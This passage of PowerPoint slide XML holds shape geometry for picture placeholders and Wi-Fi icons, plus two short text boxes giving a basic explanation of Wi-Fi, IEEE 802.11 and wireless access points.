              <a:gd name="connsiteX15" fmla="*/ 2125378 w 3449405"/>
              <a:gd name="connsiteY15" fmla="*/ 165989 h 3449403"/>
              <a:gd name="connsiteX16" fmla="*/ 3283426 w 3449405"/>
              <a:gd name="connsiteY16" fmla="*/ 1324037 h 3449403"/>
              <a:gd name="connsiteX17" fmla="*/ 3430970 w 3449405"/>
              <a:gd name="connsiteY17" fmla="*/ 1580964 h 3449403"/>
              <a:gd name="connsiteX18" fmla="*/ 3430970 w 3449405"/>
              <a:gd name="connsiteY18" fmla="*/ 1868437 h 3449403"/>
              <a:gd name="connsiteX19" fmla="*/ 3283416 w 3449405"/>
              <a:gd name="connsiteY19" fmla="*/ 2125376 h 3449403"/>
              <a:gd name="connsiteX20" fmla="*/ 2125368 w 3449405"/>
              <a:gd name="connsiteY20" fmla="*/ 3283425 h 3449403"/>
              <a:gd name="connsiteX21" fmla="*/ 1868439 w 3449405"/>
              <a:gd name="connsiteY21" fmla="*/ 3430969 h 3449403"/>
              <a:gd name="connsiteX22" fmla="*/ 1580965 w 3449405"/>
              <a:gd name="connsiteY22" fmla="*/ 3430969 h 3449403"/>
              <a:gd name="connsiteX23" fmla="*/ 1324038 w 3449405"/>
              <a:gd name="connsiteY23" fmla="*/ 3283424 h 3449403"/>
              <a:gd name="connsiteX24" fmla="*/ 165990 w 3449405"/>
              <a:gd name="connsiteY24" fmla="*/ 2125376 h 3449403"/>
              <a:gd name="connsiteX25" fmla="*/ 18434 w 3449405"/>
              <a:gd name="connsiteY25" fmla="*/ 1868438 h 3449403"/>
              <a:gd name="connsiteX26" fmla="*/ 18445 w 3449405"/>
              <a:gd name="connsiteY26" fmla="*/ 1580974 h 3449403"/>
              <a:gd name="connsiteX27" fmla="*/ 165979 w 3449405"/>
              <a:gd name="connsiteY27" fmla="*/ 1324037 h 3449403"/>
              <a:gd name="connsiteX28" fmla="*/ 1324027 w 3449405"/>
              <a:gd name="connsiteY28" fmla="*/ 165987 h 3449403"/>
              <a:gd name="connsiteX29" fmla="*/ 1580975 w 3449405"/>
              <a:gd name="connsiteY29" fmla="*/ 18442 h 3449403"/>
              <a:gd name="connsiteX30" fmla="*/ 1724705 w 3449405"/>
              <a:gd name="connsiteY30" fmla="*/ 0 h 3449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449405" h="3449403">
                <a:moveTo>
                  <a:pt x="1724705" y="934788"/>
                </a:moveTo>
                <a:cubicBezTo>
                  <a:pt x="1679655" y="934788"/>
                  <a:pt x="1639835" y="951209"/>
                  <a:pt x="1605245" y="984069"/>
                </a:cubicBezTo>
                <a:lnTo>
                  <a:pt x="984064" y="1605250"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="951211" y="1639836"/>
                  <a:pt x="934785" y="1679659"/>
                  <a:pt x="934790" y="1724703"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="934790" y="1769752"/>
                  <a:pt x="951210" y="1809570"/>
                  <a:pt x="984064" y="1844166"/>
                </a:cubicBezTo>
                <a:lnTo>
                  <a:pt x="1605244" y="2465346"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="1639836" y="2498195"/>
                  <a:pt x="1679661" y="2514621"/>
                  <a:pt x="1724705" y="2514617"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="1769748" y="2514620"/>
                  <a:pt x="1809572" y="2498195"/>
                  <a:pt x="1844162" y="2465347"/>
                </a:cubicBezTo>
                <a:lnTo>
                  <a:pt x="2465343" y="1844166"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="2498195" y="1809569"/>
                  <a:pt x="2514617" y="1769751"/>
                  <a:pt x="2514616" y="1724703"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="2514623" y="1679659"/>
                  <a:pt x="2498198" y="1639835"/>
                  <a:pt x="2465348" y="1605244"/>
                </a:cubicBezTo>
                <a:lnTo>
                  <a:pt x="1844168" y="984063"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="1809571" y="951209"/>
                  <a:pt x="1769753" y="934788"/>
                  <a:pt x="1724705" y="934788"/>
                </a:cubicBezTo>
                <a:close/>
                <a:moveTo>
                  <a:pt x="1724705" y="0"/>
                </a:moveTo>
                <a:cubicBezTo>
                  <a:pt x="1772615" y="-3"/>
                  <a:pt x="1820530" y="6142"/>
                  <a:pt x="1868439" y="18432"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="1964261" y="43034"/>
                  <a:pt x="2049903" y="92215"/>
                  <a:pt x="2125378" y="165989"/>
                </a:cubicBezTo>
                <a:lnTo>
                  <a:pt x="3283426" y="1324037"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="3357187" y="1399500"/>
                  <a:pt x="3406369" y="1485143"/>
                  <a:pt x="3430970" y="1580964"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="3455552" y="1676785"/>
                  <a:pt x="3455550" y="1772617"/>
                  <a:pt x="3430970" y="1868437"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="3406369" y="1964259"/>
                  <a:pt x="3357197" y="2049913"/>
                  <a:pt x="3283416" y="2125376"/>
                </a:cubicBezTo>
                <a:lnTo>
                  <a:pt x="2125368" y="3283425"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="2049915" y="3357197"/>
                  <a:pt x="1964261" y="3406367"/>
                  <a:pt x="1868439" y="3430969"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="1772618" y="3455548"/>
                  <a:pt x="1676786" y="3455549"/>
                  <a:pt x="1580965" y="3430969"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="1485143" y="3406367"/>
                  <a:pt x="1399501" y="3357186"/>
                  <a:pt x="1324038" y="3283424"/>
                </a:cubicBezTo>
                <a:lnTo>
                  <a:pt x="165990" y="2125376"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="92217" y="2049902"/>
                  <a:pt x="43035" y="1964259"/>
                  <a:pt x="18434" y="1868438"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="-6148" y="1772618"/>
                  <a:pt x="-6145" y="1676786"/>
                  <a:pt x="18445" y="1580974"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="43035" y="1485142"/>
                  <a:pt x="92217" y="1399500"/>
                  <a:pt x="165979" y="1324037"/>
                </a:cubicBezTo>
                <a:lnTo>
                  <a:pt x="1324027" y="165987"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="1399501" y="92215"/>
                  <a:pt x="1485143" y="43033"/>
                  <a:pt x="1580975" y="18442"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="1628881" y="6148"/>
                  <a:pt x="1676793" y="-1"/>
                  <a:pt x="1724705" y="0"/>
                </a:cubicBezTo>
                <a:close/>
              </a:path>
            </a:pathLst>
          </a:custGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="24" name="Picture Placeholder 21">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{75B1AF53-D518-49CD-AF58-CE15EDDBCCB4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093" r="24093"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="8501063" y="1970088"/>
            <a:ext cx="2300287" cy="2298700"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst>
              <a:gd name="connsiteX0" fmla="*/ 1724705 w 3449405"/>
              <a:gd name="connsiteY0" fmla="*/ 934788 h 3449403"/>
              <a:gd name="connsiteX1" fmla="*/ 1605245 w 3449405"/>
              <a:gd name="connsiteY1" fmla="*/ 984069 h 3449403"/>
              <a:gd name="connsiteX2" fmla="*/ 984064 w 3449405"/>
              <a:gd name="connsiteY2" fmla="*/ 1605250 h 3449403"/>
              <a:gd name="connsiteX3" fmla="*/ 934790 w 3449405"/>
              <a:gd name="connsiteY3" fmla="*/ 1724703 h 3449403"/>
              <a:gd name="connsiteX4" fmla="*/ 984064 w 3449405"/>
              <a:gd name="connsiteY4" fmla="*/ 1844166 h 3449403"/>
              <a:gd name="connsiteX5" fmla="*/ 1605244 w 3449405"/>
              <a:gd name="connsiteY5" fmla="*/ 2465346 h 3449403"/>
              <a:gd name="connsiteX6" fmla="*/ 1724705 w 3449405"/>
              <a:gd name="connsiteY6" fmla="*/ 2514617 h 3449403"/>
              <a:gd name="connsiteX7" fmla="*/ 1844162 w 3449405"/>
              <a:gd name="connsiteY7" fmla="*/ 2465347 h 3449403"/>
              <a:gd name="connsiteX8" fmla="*/ 2465343 w 3449405"/>
              <a:gd name="connsiteY8" fmla="*/ 1844166 h 3449403"/>
              <a:gd name="connsiteX9" fmla="*/ 2514616 w 3449405"/>
              <a:gd name="connsiteY9" fmla="*/ 1724703 h 3449403"/>
              <a:gd name="connsiteX10" fmla="*/ 2465348 w 3449405"/>
              <a:gd name="connsiteY10" fmla="*/ 1605244 h 3449403"/>
              <a:gd name="connsiteX11" fmla="*/ 1844168 w 3449405"/>
              <a:gd name="connsiteY11" fmla="*/ 984063 h 3449403"/>
              <a:gd name="connsiteX12" fmla="*/ 1724705 w 3449405"/>
              <a:gd name="connsiteY12" fmla="*/ 934788 h 3449403"/>
              <a:gd name="connsiteX13" fmla="*/ 1724705 w 3449405"/>
              <a:gd name="connsiteY13" fmla="*/ 0 h 3449403"/>
              <a:gd name="connsiteX14" fmla="*/ 1868439 w 3449405"/>
              <a:gd name="connsiteY14" fmla="*/ 18432 h 3449403"/>
              <a:gd name="connsiteX15" fmla="*/ 2125378 w 3449405"/>
              <a:gd name="connsiteY15" fmla="*/ 165989 h 3449403"/>
              <a:gd name="connsiteX16" fmla="*/ 3283426 w 3449405"/>
              <a:gd name="connsiteY16" fmla="*/ 1324037 h 3449403"/>
              <a:gd name="connsiteX17" fmla="*/ 3430970 w 3449405"/>
              <a:gd name="connsiteY17" fmla="*/ 1580964 h 3449403"/>
              <a:gd name="connsiteX18" fmla="*/ 3430970 w 3449405"/>
              <a:gd name="connsiteY18" fmla="*/ 1868437 h 3449403"/>
              <a:gd name="connsiteX19" fmla="*/ 3283416 w 3449405"/>
              <a:gd name="connsiteY19" fmla="*/ 2125376 h 3449403"/>
              <a:gd name="connsiteX20" fmla="*/ 2125368 w 3449405"/>
              <a:gd name="connsiteY20" fmla="*/ 3283425 h 3449403"/>
              <a:gd name="connsiteX21" fmla="*/ 1868439 w 3449405"/>
              <a:gd name="connsiteY21" fmla="*/ 3430969 h 3449403"/>
              <a:gd name="connsiteX22" fmla="*/ 1580965 w 3449405"/>
              <a:gd name="connsiteY22" fmla="*/ 3430969 h 3449403"/>
              <a:gd name="connsiteX23" fmla="*/ 1324038 w 3449405"/>
              <a:gd name="connsiteY23" fmla="*/ 3283424 h 3449403"/>
              <a:gd name="connsiteX24" fmla="*/ 165990 w 3449405"/>
              <a:gd name="connsiteY24" fmla="*/ 2125376 h 3449403"/>
              <a:gd name="connsiteX25" fmla="*/ 18434 w 3449405"/>
              <a:gd name="connsiteY25" fmla="*/ 1868438 h 3449403"/>
              <a:gd name="connsiteX26" fmla="*/ 18445 w 3449405"/>
              <a:gd name="connsiteY26" fmla="*/ 1580974 h 3449403"/>
              <a:gd name="connsiteX27" fmla="*/ 165979 w 3449405"/>
              <a:gd name="connsiteY27" fmla="*/ 1324037 h 3449403"/>
              <a:gd name="connsiteX28" fmla="*/ 1324027 w 3449405"/>
              <a:gd name="connsiteY28" fmla="*/ 165987 h 3449403"/>
              <a:gd name="connsiteX29" fmla="*/ 1580975 w 3449405"/>
              <a:gd name="connsiteY29" fmla="*/ 18442 h 3449403"/>
              <a:gd name="connsiteX30" fmla="*/ 1724705 w 3449405"/>
              <a:gd name="connsiteY30" fmla="*/ 0 h 3449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449405" h="3449403">
                <a:moveTo>
                  <a:pt x="1724705" y="934788"/>
                </a:moveTo>
                <a:cubicBezTo>
                  <a:pt x="1679655" y="934788"/>
                  <a:pt x="1639835" y="951209"/>
                  <a:pt x="1605245" y="984069"/>
                </a:cubicBezTo>
                <a:lnTo>
                  <a:pt x="984064" y="1605250"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="951211" y="1639836"/>
                  <a:pt x="934785" y="1679659"/>
                  <a:pt x="934790" y="1724703"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="934790" y="1769752"/>
                  <a:pt x="951210" y="1809570"/>
                  <a:pt x="984064" y="1844166"/>
                </a:cubicBezTo>
                <a:lnTo>
                  <a:pt x="1605244" y="2465346"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="1639836" y="2498195"/>
                  <a:pt x="1679661" y="2514621"/>
                  <a:pt x="1724705" y="2514617"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="1769748" y="2514620"/>
                  <a:pt x="1809572" y="2498195"/>
                  <a:pt x="1844162" y="2465347"/>
                </a:cubicBezTo>
                <a:lnTo>
                  <a:pt x="2465343" y="1844166"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="2498195" y="1809569"/>
                  <a:pt x="2514617" y="1769751"/>
                  <a:pt x="2514616" y="1724703"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="2514623" y="1679659"/>
                  <a:pt x="2498198" y="1639835"/>
                  <a:pt x="2465348" y="1605244"/>
                </a:cubicBezTo>
                <a:lnTo>
                  <a:pt x="1844168" y="984063"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="1809571" y="951209"/>
                  <a:pt x="1769753" y="934788"/>
                  <a:pt x="1724705" y="934788"/>
                </a:cubicBezTo>
                <a:close/>
                <a:moveTo>
                  <a:pt x="1724705" y="0"/>
                </a:moveTo>
                <a:cubicBezTo>
                  <a:pt x="1772615" y="-3"/>
                  <a:pt x="1820530" y="6142"/>
                  <a:pt x="1868439" y="18432"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="1964261" y="43034"/>
                  <a:pt x="2049903" y="92215"/>
                  <a:pt x="2125378" y="165989"/>
                </a:cubicBezTo>
                <a:lnTo>
                  <a:pt x="3283426" y="1324037"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="3357187" y="1399500"/>
                  <a:pt x="3406369" y="1485143"/>
                  <a:pt x="3430970" y="1580964"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="3455552" y="1676785"/>
                  <a:pt x="3455550" y="1772617"/>
                  <a:pt x="3430970" y="1868437"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="3406369" y="1964259"/>
                  <a:pt x="3357197" y="2049913"/>
                  <a:pt x="3283416" y="2125376"/>
                </a:cubicBezTo>
                <a:lnTo>
                  <a:pt x="2125368" y="3283425"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="2049915" y="3357197"/>
                  <a:pt x="1964261" y="3406367"/>
                  <a:pt x="1868439" y="3430969"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="1772618" y="3455548"/>
                  <a:pt x="1676786" y="3455549"/>
                  <a:pt x="1580965" y="3430969"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="1485143" y="3406367"/>
                  <a:pt x="1399501" y="3357186"/>
                  <a:pt x="1324038" y="3283424"/>
                </a:cubicBezTo>
                <a:lnTo>
                  <a:pt x="165990" y="2125376"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="92217" y="2049902"/>
                  <a:pt x="43035" y="1964259"/>
                  <a:pt x="18434" y="1868438"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="-6148" y="1772618"/>
                  <a:pt x="-6145" y="1676786"/>
                  <a:pt x="18445" y="1580974"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="43035" y="1485142"/>
                  <a:pt x="92217" y="1399500"/>
                  <a:pt x="165979" y="1324037"/>
                </a:cubicBezTo>
                <a:lnTo>
                  <a:pt x="1324027" y="165987"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="1399501" y="92215"/>
                  <a:pt x="1485143" y="43033"/>
                  <a:pt x="1580975" y="18442"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="1628881" y="6148"/>
                  <a:pt x="1676793" y="-1"/>
                  <a:pt x="1724705" y="0"/>
                </a:cubicBezTo>
                <a:close/>
              </a:path>
            </a:pathLst>
          </a:custGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="25" name="Subtitle 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{C365D4FA-98E9-42B2-B873-C354C7BFFE5E}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3200399" y="4523509"/>
            <a:ext cx="4064995" cy="1648691"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr vert="horz" wrap="square" lIns="108745" tIns="54373" rIns="108745" bIns="54373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algn="just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Wireless network (Wi-Fi) refers to WLANs based on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IEEE 802.11 standard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which allows the device to access the network from anywhere within an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AP range</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="ar-JO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" name="Subtitle 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{AEB9CC43-736D-4769-AE93-2444FB9E65C7}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7783639" y="4523509"/>
            <a:ext cx="3951161" cy="1648691"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr vert="horz" wrap="square" lIns="108745" tIns="54373" rIns="108745" bIns="54373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algn="just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Devices, such as a personal computer, video-game console, and smartphone, use Wi-Fi to connect to a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network resource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such as the Internet, via a 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wireless network AP</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="ar-JO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" name="Freeform 174">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{0C1B0286-B84D-468C-B62E-3C86921EAC2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022709" y="2925870"/>
            <a:ext cx="433965" cy="388111"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst>
              <a:gd name="T0" fmla="*/ 220617 w 70"/>
              <a:gd name="T1" fmla="*/ 68684 h 49"/>
              <a:gd name="T2" fmla="*/ 120650 w 70"/>
              <a:gd name="T3" fmla="*/ 30908 h 49"/>
              <a:gd name="T4" fmla="*/ 24130 w 70"/>
              <a:gd name="T5" fmla="*/ 68684 h 49"/>
              <a:gd name="T6" fmla="*/ 20683 w 70"/>
              <a:gd name="T7" fmla="*/ 68684 h 49"/>
              <a:gd name="T8" fmla="*/ 0 w 70"/>
              <a:gd name="T9" fmla="*/ 48079 h 49"/>
              <a:gd name="T10" fmla="*/ 3447 w 70"/>
              <a:gd name="T11" fmla="*/ 44644 h 49"/>
              <a:gd name="T12" fmla="*/ 120650 w 70"/>
              <a:gd name="T13" fmla="*/ 0 h 49"/>
              <a:gd name="T14" fmla="*/ 241300 w 70"/>
              <a:gd name="T15" fmla="*/ 44644 h 49"/>
              <a:gd name="T16" fmla="*/ 241300 w 70"/>
              <a:gd name="T17" fmla="*/ 48079 h 49"/>
              <a:gd name="T18" fmla="*/ 220617 w 70"/>
              <a:gd name="T19" fmla="*/ 68684 h 49"/>
              <a:gd name="T20" fmla="*/ 220617 w 70"/>
              <a:gd name="T21" fmla="*/ 68684 h 49"/>
              <a:gd name="T22" fmla="*/ 186146 w 70"/>
              <a:gd name="T23" fmla="*/ 103026 h 49"/>
              <a:gd name="T24" fmla="*/ 120650 w 70"/>
              <a:gd name="T25" fmla="*/ 75552 h 49"/>
              <a:gd name="T26" fmla="*/ 55154 w 70"/>
              <a:gd name="T27" fmla="*/ 103026 h 49"/>
              <a:gd name="T28" fmla="*/ 34471 w 70"/>
              <a:gd name="T29" fmla="*/ 82420 h 49"/>
              <a:gd name="T30" fmla="*/ 34471 w 70"/>
              <a:gd name="T31" fmla="*/ 78986 h 49"/>
              <a:gd name="T32" fmla="*/ 120650 w 70"/>
              <a:gd name="T33" fmla="*/ 44644 h 49"/>
              <a:gd name="T34" fmla="*/ 206829 w 70"/>
              <a:gd name="T35" fmla="*/ 78986 h 49"/>
              <a:gd name="T36" fmla="*/ 210276 w 70"/>
              <a:gd name="T37" fmla="*/ 82420 h 49"/>
              <a:gd name="T38" fmla="*/ 189593 w 70"/>
              <a:gd name="T39" fmla="*/ 103026 h 49"/>
              <a:gd name="T40" fmla="*/ 186146 w 70"/>
              <a:gd name="T41" fmla="*/ 103026 h 49"/>
              <a:gd name="T42" fmla="*/ 120650 w 70"/>
              <a:gd name="T43" fmla="*/ 123631 h 49"/>
              <a:gd name="T44" fmla="*/ 89626 w 70"/>
              <a:gd name="T45" fmla="*/ 137367 h 49"/>
              <a:gd name="T46" fmla="*/ 68943 w 70"/>
              <a:gd name="T47" fmla="*/ 116762 h 49"/>
              <a:gd name="T48" fmla="*/ 68943 w 70"/>
              <a:gd name="T49" fmla="*/ 113328 h 49"/>
              <a:gd name="T50" fmla="*/ 120650 w 70"/>
              <a:gd name="T51" fmla="*/ 92723 h 49"/>
              <a:gd name="T52" fmla="*/ 175804 w 70"/>
              <a:gd name="T53" fmla="*/ 113328 h 49"/>
              <a:gd name="T54" fmla="*/ 175804 w 70"/>
              <a:gd name="T55" fmla="*/ 116762 h 49"/>
              <a:gd name="T56" fmla="*/ 155121 w 70"/>
              <a:gd name="T57" fmla="*/ 137367 h 49"/>
              <a:gd name="T58" fmla="*/ 120650 w 70"/>
              <a:gd name="T59" fmla="*/ 123631 h 49"/>
              <a:gd name="T60" fmla="*/ 99967 w 70"/>
              <a:gd name="T61" fmla="*/ 147670 h 49"/>
              <a:gd name="T62" fmla="*/ 120650 w 70"/>
              <a:gd name="T63" fmla="*/ 140802 h 49"/>
              <a:gd name="T64" fmla="*/ 141333 w 70"/>
              <a:gd name="T65" fmla="*/ 147670 h 49"/>
              <a:gd name="T66" fmla="*/ 120650 w 70"/>
              <a:gd name="T67" fmla="*/ 168275 h 49"/>
              <a:gd name="T68" fmla="*/ 99967 w 70"/>
              <a:gd name="T69" fmla="*/ 147670 h 49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70" h="49">
                <a:moveTo>
                  <a:pt x="64" y="20"/>
                </a:moveTo>
                <a:cubicBezTo>
                  <a:pt x="55" y="13"/>
                  <a:pt x="46" y="9"/>
                  <a:pt x="35" y="9"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="24" y="9"/>
                  <a:pt x="15" y="13"/>
                  <a:pt x="7" y="20"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="7" y="20"/>
                  <a:pt x="7" y="20"/>
                  <a:pt x="6" y="20"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="5" y="20"/>
                  <a:pt x="0" y="15"/>
                  <a:pt x="0" y="14"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="0" y="14"/>
                  <a:pt x="0" y="14"/>
                  <a:pt x="1" y="13"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="10" y="4"/>
                  <a:pt x="23" y="0"/>
                  <a:pt x="35" y="0"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="48" y="0"/>
                  <a:pt x="61" y="4"/>
                  <a:pt x="70" y="13"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="70" y="14"/>
                  <a:pt x="70" y="14"/>
                  <a:pt x="70" y="14"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="70" y="15"/>
                  <a:pt x="65" y="20"/>
                  <a:pt x="64" y="20"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="64" y="20"/>
                  <a:pt x="64" y="20"/>
                  <a:pt x="64" y="20"/>
                </a:cubicBezTo>
                <a:close/>
                <a:moveTo>
                  <a:pt x="54" y="30"/>
                </a:moveTo>
                <a:cubicBezTo>
                  <a:pt x="48" y="25"/>
                  <a:pt x="43" y="22"/>
                  <a:pt x="35" y="22"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="25" y="22"/>
                  <a:pt x="16" y="30"/>
                  <a:pt x="16" y="30"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="15" y="30"/>
                  <a:pt x="10" y="25"/>
                  <a:pt x="10" y="24"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="10" y="24"/>
                  <a:pt x="10" y="23"/>
                  <a:pt x="10" y="23"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="17" y="17"/>
                  <a:pt x="26" y="13"/>
                  <a:pt x="35" y="13"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="44" y="13"/>
                  <a:pt x="54" y="17"/>
                  <a:pt x="60" y="23"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="61" y="23"/>
                  <a:pt x="61" y="24"/>
                  <a:pt x="61" y="24"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="61" y="25"/>
                  <a:pt x="56" y="30"/>
                  <a:pt x="55" y="30"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="54" y="30"/>
                  <a:pt x="54" y="30"/>
                  <a:pt x="54" y="30"/>
                </a:cubicBezTo>
                <a:close/>
                <a:moveTo>
                  <a:pt x="35" y="36"/>
                </a:moveTo>
                <a:cubicBezTo>
                  <a:pt x="30" y="36"/>
                  <a:pt x="26" y="40"/>
                  <a:pt x="26" y="40"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="25" y="40"/>
                  <a:pt x="20" y="35"/>
                  <a:pt x="20" y="34"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="20" y="33"/>
                  <a:pt x="20" y="33"/>
                  <a:pt x="20" y="33"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="24" y="29"/>
                  <a:pt x="30" y="27"/>
                  <a:pt x="35" y="27"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="41" y="27"/>
                  <a:pt x="47" y="29"/>
                  <a:pt x="51" y="33"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="51" y="33"/>
                  <a:pt x="51" y="33"/>
                  <a:pt x="51" y="34"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="51" y="35"/>
                  <a:pt x="46" y="40"/>
                  <a:pt x="45" y="40"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="44" y="40"/>
                  <a:pt x="41" y="36"/>
                  <a:pt x="35" y="36"/>
                </a:cubicBezTo>
                <a:close/>
                <a:moveTo>
                  <a:pt x="29" y="43"/>
                </a:moveTo>
                <a:cubicBezTo>
                  <a:pt x="29" y="42"/>
                  <a:pt x="34" y="41"/>
                  <a:pt x="35" y="41"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="37" y="41"/>
                  <a:pt x="41" y="42"/>
                  <a:pt x="41" y="43"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="41" y="44"/>
                  <a:pt x="36" y="49"/>
                  <a:pt x="35" y="49"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="34" y="49"/>
                  <a:pt x="29" y="44"/>
                  <a:pt x="29" y="43"/>
                </a:cubicBezTo>
                <a:close/>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:solidFill>
            <a:sysClr val="window" lastClr="FFFFFF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" name="Freeform 79">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{FF7970A7-56A4-47F1-A362-E0018AA8F78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28381" y="2935693"/>
            <a:ext cx="444318" cy="368465"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst>
              <a:gd name="T0" fmla="*/ 253546 w 168"/>
              <a:gd name="T1" fmla="*/ 247650 h 152"/>
              <a:gd name="T2" fmla="*/ 234043 w 168"/>
              <a:gd name="T3" fmla="*/ 228099 h 152"/>
              <a:gd name="T4" fmla="*/ 234043 w 168"/>
              <a:gd name="T5" fmla="*/ 19551 h 152"/>
              <a:gd name="T6" fmla="*/ 253546 w 168"/>
              <a:gd name="T7" fmla="*/ 0 h 152"/>
              <a:gd name="T8" fmla="*/ 273050 w 168"/>
              <a:gd name="T9" fmla="*/ 19551 h 152"/>
              <a:gd name="T10" fmla="*/ 273050 w 168"/>
